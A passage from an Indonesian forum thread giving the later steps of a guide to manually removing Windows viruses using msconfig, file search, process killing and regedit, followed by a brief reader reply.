    2. Tahap kedua, non-aktifkan virus di startup. Ini dilakukan agar virus tidak terloading ke memori, sehingga kita perlu membuangnya di startup. Caranya, kita bisa menggunakan perintah MSCONFIG, klik menu [Start] > [Run] > ketik msconfig. Setelah itu akan tampil “System Configuration Utility”. Lalu pilihlah [Startup], jika bingung mana virus dan mana yang bukan, pilih [Disable All]. Lalu aktifkan kembali startup yang diinginkan (jika virus sudah bersih). Namun bila kita mengetahui file yang dianggap virus, sebaiknya membuang tanda check list pada kotak bagian kiri untuk file yang dicurigai sebagai virus. Cara ini akan menonaktifkan virus di startup. Jika msconfig diblok oleh virus, gunakan tools dari ansav (ansav.exe). Pilih plugin, kemudian di registry fx buka menu yang diblok (showrun menu).
    3. Hapus file virus dari komputer. Carilah dengan menggunakan fasilitas “search” pada Windows. Klik menu [Start] > [Search], lalu carilah file .EXE virus (contohnya: happy.exe, data.exe, bulubebek.exe, dll.) yang sebelumnya loading di memori atau startup. File ini biasanya disimpan oleh pembuatnya di bagian folder Windows atau System32 dari Windows. Setelah ditemukan, delete atau hapus file tersebut. Jika ada file yang tidak bisa dihapus, cari file apa yang tidak bisa dihentikan, kemudian cari prosesnya menggunakan proses explorer dan kill prosesnya.
    4. Hapus virus dari System Registry. Ini adalah tahap terakhir, kita perlu menggunakan perintan REGEDIT untuk mengubah dan men-delete virus dari registry kita. Pilihlah [Start] > [Run] > [Regedit], lalu di menu [Edit], pilihlah [Find] (tekan Ctrl + F). masukkan nama file virus yang ingin dihapus (contohnya: happy.exe, data.exe, bulubebek.exe, dll.), lalu pilih [Find Next]. Apabila ditemukan file virus, hapuslah semua registry yang memuat virus tersebut berikut foldernya (kalau ada). Jika menu regedit diblok juga oleh virus, gunakan lagi tools ansav yang di atas.
    5. Kemudian lanjutkan dengan menekan tombol [F3] atau di menu pilih [Edit] terus [Find Next]. Biasanya file virus diletakkan di beberapa tempat registry, jangan sampai ada yang terlewatkan agar registry komputer terbebas dari loading virus tersebut. Sebab jika tidak, pekerjaan ini akan sia-sia.

    Tidak sulit kan membasmi virus tanpa antivirus? Meskipun demikian, untuk mengatasi virus-virus macro (word, excel), virus yang merusak file (extension EXE), dan virus yang susah dibersihkan, perlu digabung dengan penggunaan antivirus yang bagus untuk memperbaiki file-file yang terinfeksi.
    semoga bermanfaat....:peace::rock:

    source:ujie-cap
     
    nampes likes this.
  14. safira

    safira New Member

    Messages:
    27
    Likes Received:
    4
    Trophy Points:
    0
    wahhh...jadi sedikit mengerti tentang virus ..lanjut
     

Share This Page